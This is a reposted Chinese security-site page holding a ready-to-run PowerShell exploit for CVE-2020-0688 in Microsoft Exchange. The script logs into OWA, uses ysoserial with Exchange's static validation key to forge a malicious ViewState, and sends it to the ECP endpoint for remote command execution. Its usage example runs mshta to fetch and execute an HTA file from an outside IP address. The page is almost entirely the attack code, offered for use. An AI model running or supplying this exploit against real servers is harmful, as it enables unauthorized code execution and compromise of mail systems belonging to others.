CVE-2020-0688 powershell版

admin 2024年4月22日03:22:26评论8 views字数 4106阅读13分41秒阅读模式

专为没有python环境所用,需要ysoserial.exe 支持

CVE-2020-0688 powershell版

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
function exchange

{

param(

[alias("Help")][switch]$h=$false,
[alias("server")][String]$s,
[alias("username")][String]$u,
[alias("password")][String]$p,
[alias("command")][String]$c

)


$Help = "
CVE-2020-0688 EXP
Usage: exchange [-h] -s SERVER -u USER -p PASSWORD -c CMD
Examples:
exchange -s https://mail.x.com/ -u [email protected] -p passwd -c `"cmd.exe /c mshta http://1.1.1.1/test.hta`"
"
if(!$s){return $Help}
if(!$u){return $Help}
if(!$p){return $Help}
if(!$c){return $Help}
if($h){return $Help}




<#
$global:PSDefaultParameterValues = @{
'Invoke-RestMethod:Proxy'='http://127.0.0.1:8080'
'Invoke-WebRequest:Proxy'='http://127.0.0.1:8080'
'*:ProxyUseDefaultCredentials'=$true
}
$webproxy="http://127.0.0.1:8080"
$proxy = new-object System.Net.WebProxy
$proxy.Address = $webproxy
#>


[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

$url =$s
$target="$s/owa/auth.owa"
$destination=[uri]::EscapeDataString("$url/ecp/")

$username=$u
$pass=$p
$command=$c
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'



$postData="flags=4&password=$pass&destination=$destination&passwordText=&isUtf8=1&username=$username&forcedownlevel=0"


$CookieContainer = New-Object System.Net.CookieContainer




$buffer = [text.encoding]::ascii.getbytes($postData)

[net.httpWebRequest] $req = [net.webRequest]::create($target)
$req.method = "POST"
$req.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
$req.Headers.Add("Accept-Language: zh-CN,zh;q=0.9,en;q=0.8")
$req.Headers.Add("Accept-Encoding: gzip, deflate, br")
$req.Headers.Add("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7")
$req.Headers.Add("Origin: $url")
$req.Headers.Add("Sec-Fetch-Dest: document")
#$req.Proxy=$proxy
$req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"
$req.AllowAutoRedirect = $true
$req.MaximumAutomaticRedirections= 1
$req.ContentLength = $buffer.length
$req.TimeOut = 50000
$req.KeepAlive = $true
$req.CookieContainer = $CookieContainer
$reqst = $req.getRequestStream()
$reqst.write($buffer, 0, $buffer.length)
$reqst.flush()
$reqst.close()
[net.httpWebResponse] $res = $req.getResponse()
$SessionId=($res.Cookies['ASP.NET_SessionId']).value
$resst = $res.getResponseStream()
$sr = new-object IO.StreamReader($resst)
$result = $sr.ReadToEnd()
$res.close()
$l=($res.ResponseUri.LocalPath)
if ($l -like '/owa/auth/logon.aspx'){
write-host "[!] Login Incorrect, please try again with a different account..`n"
break
}
write-host "[+] Login successfully!`n`n"

write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug -islegacy`n"
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug-islegacy
$generator=$yso -match "^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"

$Encode = [System.Web.HttpUtility]::UrlEncode($generator)

write-host "[+] Exp url:" +"$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
$url2="$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
try {
[net.httpWebRequest] $req2 = [net.webRequest]::create($url2)
$req2.Method = "GET"
$req2.Accept = "text/html"
$req2.AllowAutoRedirect = $fals
#$req2.Proxy=$proxy
$req2.CookieContainer = $CookieContainer
$req2.TimeOut = 50000
[net.httpWebResponse] $res2 = $req2.getResponse()

#$resst = $res2.getResponseStream()
#$sr = new-object IO.StreamReader($resst)
#$result2 = $sr.ReadToEnd()
write-host "[-] Failed!"
}catch [System.Net.WebException] {
write-host "[*] Status code: 500, Maybe success!"
}


}
exchange

- source:wolvez.club

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日03:22:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-0688 powershell版https://cn-sec.com/archives/2629040.html

发表评论

匿名网友 填写信息